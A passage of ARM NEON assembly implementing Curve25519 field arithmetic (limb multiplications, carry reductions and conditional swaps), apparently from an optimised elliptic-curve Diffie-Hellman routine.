vld1.8 {d18-d19},[r7,: 128]!
veor q10,q7,q9
vld1.8 {d22-d23},[r4,: 128]!
vand q6,q6,q8
vld1.8 {d24-d25},[r5,: 128]!
vand q10,q10,q8
vld1.8 {d26-d27},[r6,: 128]!
veor q4,q4,q6
vld1.8 {d28-d29},[r7,: 128]!
veor q5,q5,q6
vld1.8 {d0},[r4,: 64]
veor q6,q7,q10
vld1.8 {d2},[r5,: 64]
veor q7,q9,q10
vld1.8 {d4},[r6,: 64]
veor q9,q11,q12
vld1.8 {d6},[r7,: 64]
veor q10,q0,q1
sub r2,r4,#32
vand q9,q9,q8
sub r4,r5,#32
vand q10,q10,q8
sub r5,r6,#32
veor q11,q11,q9
sub r6,r7,#32
veor q0,q0,q10
veor q9,q12,q9
veor q1,q1,q10
veor q10,q13,q14
veor q12,q2,q3
vand q10,q10,q8
vand q8,q12,q8
veor q12,q13,q10
veor q2,q2,q8
veor q10,q14,q10
veor q3,q3,q8
vadd.i32 q8,q4,q6
vsub.i32 q4,q4,q6
vst1.8 {d16-d17},[r2,: 128]!
vadd.i32 q6,q11,q12
vst1.8 {d8-d9},[r5,: 128]!
vsub.i32 q4,q11,q12
vst1.8 {d12-d13},[r2,: 128]!
vadd.i32 q6,q0,q2
vst1.8 {d8-d9},[r5,: 128]!
vsub.i32 q0,q0,q2
vst1.8 d12,[r2,: 64]
vadd.i32 q2,q5,q7
vst1.8 d0,[r5,: 64]
vsub.i32 q0,q5,q7
vst1.8 {d4-d5},[r4,: 128]!
vadd.i32 q2,q9,q10
vst1.8 {d0-d1},[r6,: 128]!
vsub.i32 q0,q9,q10
vst1.8 {d4-d5},[r4,: 128]!
vadd.i32 q2,q1,q3
vst1.8 {d0-d1},[r6,: 128]!
vsub.i32 q0,q1,q3
vst1.8 d4,[r4,: 64]
vst1.8 d0,[r6,: 64]
add r2,sp,#544
add r4,r3,#96
add r5,r3,#144
vld1.8 {d0-d1},[r2,: 128]
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4-d5},[r5,: 128]!
vzip.i32 q1,q2
vld1.8 {d6-d7},[r4,: 128]!
vld1.8 {d8-d9},[r5,: 128]!
vshl.i32 q5,q1,#1
vzip.i32 q3,q4
vshl.i32 q6,q2,#1
vld1.8 {d14},[r4,: 64]
vshl.i32 q8,q3,#1
vld1.8 {d15},[r5,: 64]
vshl.i32 q9,q4,#1
vmul.i32 d21,d7,d1
vtrn.32 d14,d15
vmul.i32 q11,q4,q0
vmul.i32 q0,q7,q0
vmull.s32 q12,d2,d2
vmlal.s32 q12,d11,d1
vmlal.s32 q12,d12,d0
vmlal.s32 q12,d13,d23
vmlal.s32 q12,d16,d22
vmlal.s32 q12,d7,d21
vmull.s32 q10,d2,d11
vmlal.s32 q10,d4,d1
vmlal.s32 q10,d13,d0
vmlal.s32 q10,d6,d23
vmlal.s32 q10,d17,d22
vmull.s32 q13,d10,d4
vmlal.s32 q13,d11,d3
vmlal.s32 q13,d13,d1
vmlal.s32 q13,d16,d0
vmlal.s32 q13,d17,d23
vmlal.s32 q13,d8,d22
vmull.s32 q1,d10,d5
vmlal.s32 q1,d11,d4
vmlal.s32 q1,d6,d1
vmlal.s32 q1,d17,d0
vmlal.s32 q1,d8,d23
vmull.s32 q14,d10,d6
vmlal.s32 q14,d11,d13
vmlal.s32 q14,d4,d4
vmlal.s32 q14,d17,d1
vmlal.s32 q14,d18,d0
vmlal.s32 q14,d9,d23
vmull.s32 q11,d10,d7
vmlal.s32 q11,d11,d6
vmlal.s32 q11,d12,d5
vmlal.s32 q11,d8,d1
vmlal.s32 q11,d19,d0
vmull.s32 q15,d10,d8
vmlal.s32 q15,d11,d17
vmlal.s32 q15,d12,d6
vmlal.s32 q15,d13,d5
vmlal.s32 q15,d19,d1
vmlal.s32 q15,d14,d0
vmull.s32 q2,d10,d9
vmlal.s32 q2,d11,d8
vmlal.s32 q2,d12,d7
vmlal.s32 q2,d13,d6
vmlal.s32 q2,d14,d1
vmull.s32 q0,d15,d1
vmlal.s32 q0,d10,d14
vmlal.s32 q0,d11,d19
vmlal.s32 q0,d12,d8
vmlal.s32 q0,d13,d17
vmlal.s32 q0,d6,d6
add r2,sp,#512
vld1.8 {d18-d19},[r2,: 128]
vmull.s32 q3,d16,d7
vmlal.s32 q3,d10,d15
vmlal.s32 q3,d11,d14
vmlal.s32 q3,d12,d9
vmlal.s32 q3,d13,d8
add r2,sp,#528
vld1.8 {d8-d9},[r2,: 128]
vadd.i64 q5,q12,q9
vadd.i64 q6,q15,q9
vshr.s64 q5,q5,#26
vshr.s64 q6,q6,#26
vadd.i64 q7,q10,q5
vshl.i64 q5,q5,#26
vadd.i64 q8,q7,q4
vadd.i64 q2,q2,q6
vshl.i64 q6,q6,#26
vadd.i64 q10,q2,q4
vsub.i64 q5,q12,q5
vshr.s64 q8,q8,#25
vsub.i64 q6,q15,q6
vshr.s64 q10,q10,#25
vadd.i64 q12,q13,q8
vshl.i64 q8,q8,#25
vadd.i64 q13,q12,q9
vadd.i64 q0,q0,q10
vsub.i64 q7,q7,q8
vshr.s64 q8,q13,#26
vshl.i64 q10,q10,#25
vadd.i64 q13,q0,q9
vadd.i64 q1,q1,q8
vshl.i64 q8,q8,#26
vadd.i64 q15,q1,q4
vsub.i64 q2,q2,q10
vshr.s64 q10,q13,#26
vsub.i64 q8,q12,q8
vshr.s64 q12,q15,#25
vadd.i64 q3,q3,q10
vshl.i64 q10,q10,#26
vadd.i64 q13,q3,q4
vadd.i64 q14,q14,q12
add r2,r3,#288
vshl.i64 q12,q12,#25
add r4,r3,#336
vadd.i64 q15,q14,q9
add r2,r2,#8
vsub.i64 q0,q0,q10
add r4,r4,#8
vshr.s64 q10,q13,#25
vsub.i64 q1,q1,q12
vshr.s64 q12,q15,#26
vadd.i64 q13,q10,q10
vadd.i64 q11,q11,q12
vtrn.32 d16,d2
vshl.i64 q12,q12,#26
vtrn.32 d17,d3
vadd.i64 q1,q11,q4
vadd.i64 q4,q5,q13
vst1.8 d16,[r2,: 64]!
vshl.i64 q5,q10,#4
vst1.8 d17,[r4,: 64]!
vsub.i64 q8,q14,q12
vshr.s64 q1,q1,#25
vadd.i64 q4,q4,q5
vadd.i64 q5,q6,q1
vshl.i64 q1,q1,#25
vadd.i64 q6,q5,q9
vadd.i64 q4,q4,q10
vshl.i64 q10,q10,#25
vadd.i64 q9,q4,q9
vsub.i64 q1,q11,q1
vshr.s64 q6,q6,#26
vsub.i64 q3,q3,q10
vtrn.32 d16,d2
vshr.s64 q9,q9,#26
vtrn.32 d17,d3
vadd.i64 q1,q2,q6
vst1.8 d16,[r2,: 64]
vshl.i64 q2,q6,#26
vst1.8 d17,[r4,: 64]
vadd.i64 q6,q7,q9
vtrn.32 d0,d6
vshl.i64 q7,q9,#26
vtrn.32 d1,d7
vsub.i64 q2,q5,q2
add r2,r2,#16
vsub.i64 q3,q4,q7
vst1.8 d0,[r2,: 64]
add r4,r4,#16
vst1.8 d1,[r4,: 64]
vtrn.32 d4,d2
vtrn.32 d5,d3
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d6,d12
vtrn.32 d7,d13
vst1.8 d4,[r2,: 64]
vst1.8 d5,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d6,[r2,: 64]
vst1.8 d7,[r4,: 64]
add r2,r3,#240
add r4,r3,#96
vld1.8 {d0-d1},[r4,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4},[r4,: 64]
add r4,r3,#144
vld1.8 {d6-d7},[r4,: 128]!
vtrn.32 q0,q3
vld1.8 {d8-d9},[r4,: 128]!
vshl.i32 q5,q0,#4
vtrn.32 q1,q4
vshl.i32 q6,q3,#4
vadd.i32 q5,q5,q0
vadd.i32 q6,q6,q3
vshl.i32 q7,q1,#4
vld1.8 {d5},[r4,: 64]
vshl.i32 q8,q4,#4
vtrn.32 d4,d5
vadd.i32 q7,q7,q1
vadd.i32 q8,q8,q4
vld1.8 {d18-d19},[r2,: 128]!
vshl.i32 q10,q2,#4
vld1.8 {d22-d23},[r2,: 128]!
vadd.i32 q10,q10,q2
vld1.8 {d24},[r2,: 64]
vadd.i32 q5,q5,q0
add r2,r3,#192
vld1.8 {d26-d27},[r2,: 128]!
vadd.i32 q6,q6,q3
vld1.8 {d28-d29},[r2,: 128]!
vadd.i32 q8,q8,q4
vld1.8 {d25},[r2,: 64]
vadd.i32 q10,q10,q2
vtrn.32 q9,q13
vadd.i32 q7,q7,q1
vadd.i32 q5,q5,q0
vtrn.32 q11,q14
vadd.i32 q6,q6,q3
add r2,sp,#560
vadd.i32 q10,q10,q2
vtrn.32 d24,d25
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q6,q13,#1
add r2,sp,#576
vst1.8 {d20-d21},[r2,: 128]
vshl.i32 q10,q14,#1
add r2,sp,#592
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q15,q12,#1
vadd.i32 q8,q8,q4
vext.32 d10,d31,d30,#0
vadd.i32 q7,q7,q1
add r2,sp,#608
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q8,d18,d5
vmlal.s32 q8,d26,d4
vmlal.s32 q8,d19,d9
vmlal.s32 q8,d27,d3
vmlal.s32 q8,d22,d8
vmlal.s32 q8,d28,d2
vmlal.s32 q8,d23,d7
vmlal.s32 q8,d29,d1
vmlal.s32 q8,d24,d6
vmlal.s32 q8,d25,d0
add r2,sp,#624
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q2,d18,d4
vmlal.s32 q2,d12,d9
vmlal.s32 q2,d13,d8
vmlal.s32 q2,d19,d3
vmlal.s32 q2,d22,d2
vmlal.s32 q2,d23,d1
vmlal.s32 q2,d24,d0
add r2,sp,#640
vst1.8 {d20-d21},[r2,: 128]
vmull.s32 q7,d18,d9
vmlal.s32 q7,d26,d3
vmlal.s32 q7,d19,d8
vmlal.s32 q7,d27,d2
vmlal.s32 q7,d22,d7
vmlal.s32 q7,d28,d1
vmlal.s32 q7,d23,d6
vmlal.s32 q7,d29,d0
add r2,sp,#656
vst1.8 {d10-d11},[r2,: 128]
vmull.s32 q5,d18,d3
vmlal.s32 q5,d19,d2
vmlal.s32 q5,d22,d1
vmlal.s32 q5,d23,d0
vmlal.s32 q5,d12,d8
add r2,sp,#672
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q4,d18,d8
vmlal.s32 q4,d26,d2
vmlal.s32 q4,d19,d7
vmlal.s32 q4,d27,d1
vmlal.s32 q4,d22,d6
vmlal.s32 q4,d28,d0
vmull.s32 q8,d18,d7
vmlal.s32 q8,d26,d1
vmlal.s32 q8,d19,d6
vmlal.s32 q8,d27,d0
add r2,sp,#576
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q7,d24,d21
vmlal.s32 q7,d25,d20
vmlal.s32 q4,d23,d21
vmlal.s32 q4,d29,d20
vmlal.s32 q8,d22,d21
vmlal.s32 q8,d28,d20
vmlal.s32 q5,d24,d20
add r2,sp,#576
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q7,d18,d6
vmlal.s32 q7,d26,d0
add r2,sp,#656
vld1.8 {d30-d31},[r2,: 128]
vmlal.s32 q2,d30,d21
vmlal.s32 q7,d19,d21
vmlal.s32 q7,d27,d20
add r2,sp,#624
vld1.8 {d26-d27},[r2,: 128]
vmlal.s32 q4,d25,d27
vmlal.s32 q8,d29,d27
vmlal.s32 q8,d25,d26
vmlal.s32 q7,d28,d27
vmlal.s32 q7,d29,d26
add r2,sp,#608
vld1.8 {d28-d29},[r2,: 128]
vmlal.s32 q4,d24,d29
vmlal.s32 q8,d23,d29
vmlal.s32 q8,d24,d28
vmlal.s32 q7,d22,d29
vmlal.s32 q7,d23,d28
add r2,sp,#608
vst1.8 {d8-d9},[r2,: 128]
add r2,sp,#560
vld1.8 {d8-d9},[r2,: 128]
vmlal.s32 q7,d24,d9
vmlal.s32 q7,d25,d31
vmull.s32 q1,d18,d2
vmlal.s32 q1,d19,d1
vmlal.s32 q1,d22,d0
vmlal.s32 q1,d24,d27
vmlal.s32 q1,d23,d20
vmlal.s32 q1,d12,d7
vmlal.s32 q1,d13,d6
vmull.s32 q6,d18,d1
vmlal.s32 q6,d19,d0
vmlal.s32 q6,d23,d27
vmlal.s32 q6,d22,d20
vmlal.s32 q6,d24,d26
vmull.s32 q0,d18,d0
vmlal.s32 q0,d22,d27
vmlal.s32 q0,d23,d26
vmlal.s32 q0,d24,d31
vmlal.s32 q0,d19,d20
add r2,sp,#640
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q2,d18,d7
vmlal.s32 q2,d19,d6
vmlal.s32 q5,d18,d6
vmlal.s32 q5,d19,d21
vmlal.s32 q1,d18,d21
vmlal.s32 q1,d19,d29
vmlal.s32 q0,d18,d28
vmlal.s32 q0,d19,d9
vmlal.s32 q6,d18,d29
vmlal.s32 q6,d19,d28
add r2,sp,#592
vld1.8 {d18-d19},[r2,: 128]
add r2,sp,#512
vld1.8 {d22-d23},[r2,: 128]
vmlal.s32 q5,d19,d7
vmlal.s32 q0,d18,d21
vmlal.s32 q0,d19,d29
vmlal.s32 q6,d18,d6
add r2,sp,#528
vld1.8 {d6-d7},[r2,: 128]
vmlal.s32 q6,d19,d21
add r2,sp,#576
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q0,d30,d8
add r2,sp,#672
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q5,d30,d29
add r2,sp,#608
vld1.8 {d24-d25},[r2,: 128]
vmlal.s32 q1,d30,d28
vadd.i64 q13,q0,q11
vadd.i64 q14,q5,q11
vmlal.s32 q6,d30,d9
vshr.s64 q4,q13,#26
vshr.s64 q13,q14,#26
vadd.i64 q7,q7,q4
vshl.i64 q4,q4,#26
vadd.i64 q14,q7,q3
vadd.i64 q9,q9,q13
vshl.i64 q13,q13,#26
vadd.i64 q15,q9,q3
vsub.i64 q0,q0,q4
vshr.s64 q4,q14,#25
vsub.i64 q5,q5,q13
vshr.s64 q13,q15,#25
vadd.i64 q6,q6,q4
vshl.i64 q4,q4,#25
vadd.i64 q14,q6,q11
vadd.i64 q2,q2,q13
vsub.i64 q4,q7,q4
vshr.s64 q7,q14,#26
vshl.i64 q13,q13,#25
vadd.i64 q14,q2,q11
vadd.i64 q8,q8,q7
vshl.i64 q7,q7,#26
vadd.i64 q15,q8,q3
vsub.i64 q9,q9,q13
vshr.s64 q13,q14,#26
vsub.i64 q6,q6,q7
vshr.s64 q7,q15,#25
vadd.i64 q10,q10,q13
vshl.i64 q13,q13,#26
vadd.i64 q14,q10,q3
vadd.i64 q1,q1,q7
add r2,r3,#144
vshl.i64 q7,q7,#25
add r4,r3,#96
vadd.i64 q15,q1,q11
add r2,r2,#8
vsub.i64 q2,q2,q13
add r4,r4,#8
vshr.s64 q13,q14,#25
vsub.i64 q7,q8,q7
vshr.s64 q8,q15,#26
vadd.i64 q14,q13,q13
vadd.i64 q12,q12,q8
vtrn.32 d12,d14
vshl.i64 q8,q8,#26
vtrn.32 d13,d15
vadd.i64 q3,q12,q3
vadd.i64 q0,q0,q14
vst1.8 d12,[r2,: 64]!
vshl.i64 q7,q13,#4
vst1.8 d13,[r4,: 64]!
vsub.i64 q1,q1,q8
vshr.s64 q3,q3,#25
vadd.i64 q0,q0,q7
vadd.i64 q5,q5,q3
vshl.i64 q3,q3,#25
vadd.i64 q6,q5,q11
vadd.i64 q0,q0,q13
vshl.i64 q7,q13,#25
vadd.i64 q8,q0,q11
vsub.i64 q3,q12,q3
vshr.s64 q6,q6,#26
vsub.i64 q7,q10,q7
vtrn.32 d2,d6
vshr.s64 q8,q8,#26
vtrn.32 d3,d7
vadd.i64 q3,q9,q6
vst1.8 d2,[r2,: 64]
vshl.i64 q6,q6,#26
vst1.8 d3,[r4,: 64]
vadd.i64 q1,q4,q8
vtrn.32 d4,d14
vshl.i64 q4,q8,#26
vtrn.32 d5,d15
vsub.i64 q5,q5,q6
add r2,r2,#16
vsub.i64 q0,q0,q4
vst1.8 d4,[r2,: 64]
add r4,r4,#16
vst1.8 d5,[r4,: 64]
vtrn.32 d10,d6
vtrn.32 d11,d7
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d0,d2
vtrn.32 d1,d3
vst1.8 d10,[r2,: 64]
vst1.8 d11,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d0,[r2,: 64]
vst1.8 d1,[r4,: 64]
add r2,r3,#288
add r4,r3,#336
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vsub.i32 q0,q0,q1
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4-d5},[r4,: 128]!
vsub.i32 q1,q1,q2
add r5,r3,#240
vld1.8 {d4},[r2,: 64]
vld1.8 {d6},[r4,: 64]
vsub.i32 q2,q2,q3
vst1.8 {d0-d1},[r5,: 128]!
vst1.8 {d2-d3},[r5,: 128]!
vst1.8 d4,[r5,: 64]
add r2,r3,#144
add r4,r3,#96
add r5,r3,#144
add r6,r3,#192
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vsub.i32 q2,q0,q1
vadd.i32 q0,q0,q1
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d6-d7},[r4,: 128]!
vsub.i32 q4,q1,q3
vadd.i32 q1,q1,q3
vld1.8 {d6},[r2,: 64]
vld1.8 {d10},[r4,: 64]
vsub.i32 q6,q3,q5
vadd.i32 q3,q3,q5
vst1.8 {d4-d5},[r5,: 128]!
vst1.8 {d0-d1},[r6,: 128]!
vst1.8 {d8-d9},[r5,: 128]!
vst1.8 {d2-d3},[r6,: 128]!
vst1.8 d12,[r5,: 64]
vst1.8 d6,[r6,: 64]
add r2,r3,#0
add r4,r3,#240
vld1.8 {d0-d1},[r4,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4},[r4,: 64]
add r4,r3,#336
vld1.8 {d6-d7},[r4,: 128]!
vtrn.32 q0,q3
vld1.8 {d8-d9},[r4,: 128]!
vshl.i32 q5,q0,#4
vtrn.32 q1,q4
vshl.i32 q6,q3,#4
vadd.i32 q5,q5,q0
vadd.i32 q6,q6,q3
vshl.i32 q7,q1,#4
vld1.8 {d5},[r4,: 64]
vshl.i32 q8,q4,#4
vtrn.32 d4,d5
vadd.i32 q7,q7,q1
vadd.i32 q8,q8,q4
vld1.8 {d18-d19},[r2,: 128]!
vshl.i32 q10,q2,#4
vld1.8 {d22-d23},[r2,: 128]!
vadd.i32 q10,q10,q2
vld1.8 {d24},[r2,: 64]
vadd.i32 q5,q5,q0
add r2,r3,#288
vld1.8 {d26-d27},[r2,: 128]!
vadd.i32 q6,q6,q3
vld1.8 {d28-d29},[r2,: 128]!
vadd.i32 q8,q8,q4
vld1.8 {d25},[r2,: 64]
vadd.i32 q10,q10,q2
vtrn.32 q9,q13
vadd.i32 q7,q7,q1
vadd.i32 q5,q5,q0
vtrn.32 q11,q14
vadd.i32 q6,q6,q3
add r2,sp,#560
vadd.i32 q10,q10,q2
vtrn.32 d24,d25
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q6,q13,#1
add r2,sp,#576
vst1.8 {d20-d21},[r2,: 128]
vshl.i32 q10,q14,#1
add r2,sp,#592
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q15,q12,#1
vadd.i32 q8,q8,q4
vext.32 d10,d31,d30,#0
vadd.i32 q7,q7,q1
add r2,sp,#608
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q8,d18,d5
vmlal.s32 q8,d26,d4
vmlal.s32 q8,d19,d9
vmlal.s32 q8,d27,d3
vmlal.s32 q8,d22,d8
vmlal.s32 q8,d28,d2
vmlal.s32 q8,d23,d7
vmlal.s32 q8,d29,d1
vmlal.s32 q8,d24,d6
vmlal.s32 q8,d25,d0
add r2,sp,#624
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q2,d18,d4
vmlal.s32 q2,d12,d9
vmlal.s32 q2,d13,d8
vmlal.s32 q2,d19,d3
vmlal.s32 q2,d22,d2
vmlal.s32 q2,d23,d1
vmlal.s32 q2,d24,d0
add r2,sp,#640
vst1.8 {d20-d21},[r2,: 128]
vmull.s32 q7,d18,d9
vmlal.s32 q7,d26,d3
vmlal.s32 q7,d19,d8
vmlal.s32 q7,d27,d2
vmlal.s32 q7,d22,d7
vmlal.s32 q7,d28,d1
vmlal.s32 q7,d23,d6
vmlal.s32 q7,d29,d0
add r2,sp,#656
vst1.8 {d10-d11},[r2,: 128]
vmull.s32 q5,d18,d3
vmlal.s32 q5,d19,d2
vmlal.s32 q5,d22,d1
vmlal.s32 q5,d23,d0
vmlal.s32 q5,d12,d8
add r2,sp,#672
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q4,d18,d8
vmlal.s32 q4,d26,d2
vmlal.s32 q4,d19,d7
vmlal.s32 q4,d27,d1
vmlal.s32 q4,d22,d6
vmlal.s32 q4,d28,d0
vmull.s32 q8,d18,d7
vmlal.s32 q8,d26,d1
vmlal.s32 q8,d19,d6
vmlal.s32 q8,d27,d0
add r2,sp,#576
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q7,d24,d21
vmlal.s32 q7,d25,d20
vmlal.s32 q4,d23,d21
vmlal.s32 q4,d29,d20
vmlal.s32 q8,d22,d21
vmlal.s32 q8,d28,d20
vmlal.s32 q5,d24,d20
add r2,sp,#576
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q7,d18,d6
vmlal.s32 q7,d26,d0
add r2,sp,#656
vld1.8 {d30-d31},[r2,: 128]
vmlal.s32 q2,d30,d21
vmlal.s32 q7,d19,d21
vmlal.s32 q7,d27,d20
add r2,sp,#624
vld1.8 {d26-d27},[r2,: 128]
vmlal.s32 q4,d25,d27
vmlal.s32 q8,d29,d27
vmlal.s32 q8,d25,d26
vmlal.s32 q7,d28,d27
vmlal.s32 q7,d29,d26
add r2,sp,#608
vld1.8 {d28-d29},[r2,: 128]
vmlal.s32 q4,d24,d29
vmlal.s32 q8,d23,d29
vmlal.s32 q8,d24,d28
vmlal.s32 q7,d22,d29
vmlal.s32 q7,d23,d28
add r2,sp,#608
vst1.8 {d8-d9},[r2,: 128]
add r2,sp,#560
vld1.8 {d8-d9},[r2,: 128]
vmlal.s32 q7,d24,d9
vmlal.s32 q7,d25,d31
vmull.s32 q1,d18,d2
vmlal.s32 q1,d19,d1
vmlal.s32 q1,d22,d0
vmlal.s32 q1,d24,d27
vmlal.s32 q1,d23,d20
vmlal.s32 q1,d12,d7
vmlal.s32 q1,d13,d6
vmull.s32 q6,d18,d1
vmlal.s32 q6,d19,d0
vmlal.s32 q6,d23,d27
vmlal.s32 q6,d22,d20
vmlal.s32 q6,d24,d26
vmull.s32 q0,d18,d0
vmlal.s32 q0,d22,d27
vmlal.s32 q0,d23,d26
vmlal.s32 q0,d24,d31
vmlal.s32 q0,d19,d20
add r2,sp,#640
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q2,d18,d7
vmlal.s32 q2,d19,d6
vmlal.s32 q5,d18,d6
vmlal.s32 q5,d19,d21
vmlal.s32 q1,d18,d21
vmlal.s32 q1,d19,d29
vmlal.s32 q0,d18,d28
vmlal.s32 q0,d19,d9
vmlal.s32 q6,d18,d29
vmlal.s32 q6,d19,d28
add r2,sp,#592
vld1.8 {d18-d19},[r2,: 128]
add r2,sp,#512
vld1.8 {d22-d23},[r2,: 128]
vmlal.s32 q5,d19,d7
vmlal.s32 q0,d18,d21
vmlal.s32 q0,d19,d29
vmlal.s32 q6,d18,d6
add r2,sp,#528
vld1.8 {d6-d7},[r2,: 128]
vmlal.s32 q6,d19,d21
add r2,sp,#576
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q0,d30,d8
add r2,sp,#672
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q5,d30,d29
add r2,sp,#608
vld1.8 {d24-d25},[r2,: 128]
vmlal.s32 q1,d30,d28
vadd.i64 q13,q0,q11
vadd.i64 q14,q5,q11
vmlal.s32 q6,d30,d9
vshr.s64 q4,q13,#26
vshr.s64 q13,q14,#26
vadd.i64 q7,q7,q4
vshl.i64 q4,q4,#26
vadd.i64 q14,q7,q3
vadd.i64 q9,q9,q13
vshl.i64 q13,q13,#26
vadd.i64 q15,q9,q3
vsub.i64 q0,q0,q4
vshr.s64 q4,q14,#25
vsub.i64 q5,q5,q13
vshr.s64 q13,q15,#25
vadd.i64 q6,q6,q4
vshl.i64 q4,q4,#25
vadd.i64 q14,q6,q11
vadd.i64 q2,q2,q13
vsub.i64 q4,q7,q4
vshr.s64 q7,q14,#26
vshl.i64 q13,q13,#25
vadd.i64 q14,q2,q11
vadd.i64 q8,q8,q7
vshl.i64 q7,q7,#26
vadd.i64 q15,q8,q3
vsub.i64 q9,q9,q13
vshr.s64 q13,q14,#26
vsub.i64 q6,q6,q7
vshr.s64 q7,q15,#25
vadd.i64 q10,q10,q13
vshl.i64 q13,q13,#26
vadd.i64 q14,q10,q3
vadd.i64 q1,q1,q7
add r2,r3,#288
vshl.i64 q7,q7,#25
add r4,r3,#96
vadd.i64 q15,q1,q11
add r2,r2,#8
vsub.i64 q2,q2,q13
add r4,r4,#8
vshr.s64 q13,q14,#25
vsub.i64 q7,q8,q7
vshr.s64 q8,q15,#26
vadd.i64 q14,q13,q13
vadd.i64 q12,q12,q8
vtrn.32 d12,d14
vshl.i64 q8,q8,#26
vtrn.32 d13,d15
vadd.i64 q3,q12,q3
vadd.i64 q0,q0,q14
vst1.8 d12,[r2,: 64]!
vshl.i64 q7,q13,#4
vst1.8 d13,[r4,: 64]!
vsub.i64 q1,q1,q8
vshr.s64 q3,q3,#25
vadd.i64 q0,q0,q7
vadd.i64 q5,q5,q3
vshl.i64 q3,q3,#25
vadd.i64 q6,q5,q11
vadd.i64 q0,q0,q13
vshl.i64 q7,q13,#25
vadd.i64 q8,q0,q11
vsub.i64 q3,q12,q3
vshr.s64 q6,q6,#26
vsub.i64 q7,q10,q7
vtrn.32 d2,d6
vshr.s64 q8,q8,#26
vtrn.32 d3,d7
vadd.i64 q3,q9,q6
vst1.8 d2,[r2,: 64]
vshl.i64 q6,q6,#26
vst1.8 d3,[r4,: 64]
vadd.i64 q1,q4,q8
vtrn.32 d4,d14
vshl.i64 q4,q8,#26
vtrn.32 d5,d15
vsub.i64 q5,q5,q6
add r2,r2,#16
vsub.i64 q0,q0,q4
vst1.8 d4,[r2,: 64]
add r4,r4,#16
vst1.8 d5,[r4,: 64]
vtrn.32 d10,d6
vtrn.32 d11,d7
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d0,d2
vtrn.32 d1,d3
vst1.8 d10,[r2,: 64]
vst1.8 d11,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d0,[r2,: 64]
vst1.8 d1,[r4,: 64]
add r2,sp,#544
add r4,r3,#144
add r5,r3,#192
vld1.8 {d0-d1},[r2,: 128]
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4-d5},[r5,: 128]!
vzip.i32 q1,q2
vld1.8 {d6-d7},[r4,: 128]!
vld1.8 {d8-d9},[r5,: 128]!
vshl.i32 q5,q1,#1
vzip.i32 q3,q4
vshl.i32 q6,q2,#1
vld1.8 {d14},[r4,: 64]
vshl.i32 q8,q3,#1
vld1.8 {d15},[r5,: 64]
vshl.i32 q9,q4,#1
vmul.i32 d21,d7,d1
vtrn.32 d14,d15
vmul.i32 q11,q4,q0
vmul.i32 q0,q7,q0
vmull.s32 q12,d2,d2
vmlal.s32 q12,d11,d1
vmlal.s32 q12,d12,d0
vmlal.s32 q12,d13,d23
vmlal.s32 q12,d16,d22
vmlal.s32 q12,d7,d21
vmull.s32 q10,d2,d11
vmlal.s32 q10,d4,d1
vmlal.s32 q10,d13,d0
vmlal.s32 q10,d6,d23
vmlal.s32 q10,d17,d22
vmull.s32 q13,d10,d4
vmlal.s32 q13,d11,d3
vmlal.s32 q13,d13,d1
vmlal.s32 q13,d16,d0
vmlal.s32 q13,d17,d23
vmlal.s32 q13,d8,d22
vmull.s32 q1,d10,d5
vmlal.s32 q1,d11,d4
vmlal.s32 q1,d6,d1
vmlal.s32 q1,d17,d0
vmlal.s32 q1,d8,d23
vmull.s32 q14,d10,d6
vmlal.s32 q14,d11,d13
vmlal.s32 q14,d4,d4
vmlal.s32 q14,d17,d1
vmlal.s32 q14,d18,d0
vmlal.s32 q14,d9,d23
vmull.s32 q11,d10,d7
vmlal.s32 q11,d11,d6
vmlal.s32 q11,d12,d5
vmlal.s32 q11,d8,d1
vmlal.s32 q11,d19,d0
vmull.s32 q15,d10,d8
vmlal.s32 q15,d11,d17
vmlal.s32 q15,d12,d6
vmlal.s32 q15,d13,d5
vmlal.s32 q15,d19,d1
vmlal.s32 q15,d14,d0
vmull.s32 q2,d10,d9
vmlal.s32 q2,d11,d8
vmlal.s32 q2,d12,d7
vmlal.s32 q2,d13,d6
vmlal.s32 q2,d14,d1
vmull.s32 q0,d15,d1
vmlal.s32 q0,d10,d14
vmlal.s32 q0,d11,d19
vmlal.s32 q0,d12,d8
vmlal.s32 q0,d13,d17
vmlal.s32 q0,d6,d6
add r2,sp,#512
vld1.8 {d18-d19},[r2,: 128]
vmull.s32 q3,d16,d7
vmlal.s32 q3,d10,d15
vmlal.s32 q3,d11,d14
vmlal.s32 q3,d12,d9
vmlal.s32 q3,d13,d8
add r2,sp,#528
vld1.8 {d8-d9},[r2,: 128]
vadd.i64 q5,q12,q9
vadd.i64 q6,q15,q9
vshr.s64 q5,q5,#26
vshr.s64 q6,q6,#26
vadd.i64 q7,q10,q5
vshl.i64 q5,q5,#26
vadd.i64 q8,q7,q4
